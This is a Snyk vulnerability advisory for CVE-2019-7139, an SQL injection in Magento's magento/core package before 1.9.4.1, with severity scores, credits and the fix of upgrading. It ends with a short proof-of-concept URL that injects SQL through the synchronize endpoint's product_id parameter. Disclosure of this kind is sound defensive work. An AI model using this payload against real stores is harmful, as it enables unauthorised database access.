Homepage
About Snyk

SQL Injection Affecting magento/core package, versions <1.9.4.1

0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High

    Threat Intelligence

    Exploit Maturity Mature
    EPSS 0.58% (78th percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-PHP-MAGENTOCORE-174031
  • published 30 Mar 2019
  • disclosed 29 Mar 2019
  • credit Charles Fol, Ambionics Security
Report a new vulnerability Found a mistake?

Introduced: 29 Mar 2019

CVE-2019-7139 Open this link in a new tab
CWE-89 Open this link in a new tab

How to fix?

Upgrade magento/core to version 1.9.4.1 or higher.

Overview

magento/core is a release of the Magento Community Edition.

Affected versions of this package are vulnerable to SQL Injection. A bug in both internal/Magento/Framework/DB/Adapter/Pdo/Mysql.php and lib/Varien/Db/Adapter/Pdo/Mysql.php allows for a SQLi vector in Magento\Catalog\Controller\Product\Frontend\Action\Synchronize.

PoC

by Charles Fol

    https://magento2website.com/catalog/product_frontend_action/synchronize?
    type_id=recently_products&
    ids[0][added_at]=&
    ids[0][product_id][from]=?&
    ids[0][product_id][to]=))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -